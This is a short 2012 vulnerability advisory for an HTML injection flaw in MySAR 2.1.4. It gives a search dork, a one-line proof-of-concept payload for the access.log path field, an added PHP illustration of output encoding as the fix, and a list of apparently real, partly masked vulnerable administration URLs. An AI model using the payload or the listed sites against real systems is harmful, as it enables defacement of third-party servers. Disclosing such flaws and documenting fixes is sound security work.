# Exploit Title: MySQL Squid Access Report 2.1.4 / HTML Injection
# Date: 23/07/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software web: http://sourceforge.net/projects/mysar/
# Tested on: Linux
# Dork: MySQL Squid Access Report 2.1.4
#
# www.chap.cl
# This advisory was reported by Daniel Godoy, a member of Project CHAP Security
# be secured / stay secure
# contacto@chap.cl
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77, _tty0, Login-Root, Knet, Kikito, Duraznit0,
InyeXion, ksha, zerial, LinuxFer, Scorp
her0, r0dr1 and the other users of RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
Find Squid's access.log file path and insert "><html tag>
Example: "><h1>PWNED!</h1>
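Added example, not MySAR's own code and not the advisory author's: a PHP illustration of the output-encoding fix for this class of bug, assuming the stored path is echoed back inside a quoted attribute of the administration form (which the leading "> in the payload suggests). The function names, the field name access_log_path and the path policy are hypothetical.

```php
<?php
// Added illustration, not MySAR source. All names here are hypothetical.

// Vulnerable pattern: the stored value is concatenated straight into an
// attribute, so a value starting with "> closes the attribute and the tag.
function render_field_unsafe(string $storedPath): string
{
    return '<input type="text" name="access_log_path" value="' . $storedPath . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
// byte sequences instead of returning an empty string.
function render_field_safe(string $storedPath): string
{
    $encoded = htmlspecialchars($storedPath, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="access_log_path" value="' . $encoded . '">';
}

// Defence in depth: refuse to store values that cannot be a log file path.
// Policy (assumed): absolute path, restricted character set, bounded length,
// no parent-directory segments.
function is_plausible_log_path(string $candidate): bool
{
    return strlen($candidate) <= 255
        && preg_match('#^/[A-Za-z0-9._/-]+\z#', $candidate) === 1
        && strpos($candidate, '..') === false;
}

$samples = [
    '/var/log/squid/access.log', // constructed benign value
    '"><h1>PWNED!</h1>',         // the advisory's example string
];

foreach ($samples as $value) {
    echo 'input:    ', $value, PHP_EOL;
    echo 'accepted: ', is_plausible_log_path($value) ? 'yes' : 'no', PHP_EOL;
    echo 'unsafe:   ', render_field_unsafe($value), PHP_EOL;
    echo 'safe:     ', render_field_safe($value), PHP_EOL, PHP_EOL;
}
```

Encoding at output is the actual fix; the input check only narrows what can be stored and should not be relied on alone.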
[DEMO]
http://www.sXXXX.com.br/mysar/www/?a=administration
http://servidor.sXXX.gob.mx/mysar/index.php?a=administration
http://www.widXXXXXXXXX.com.br/wtiproxy/www/index.php?a=administration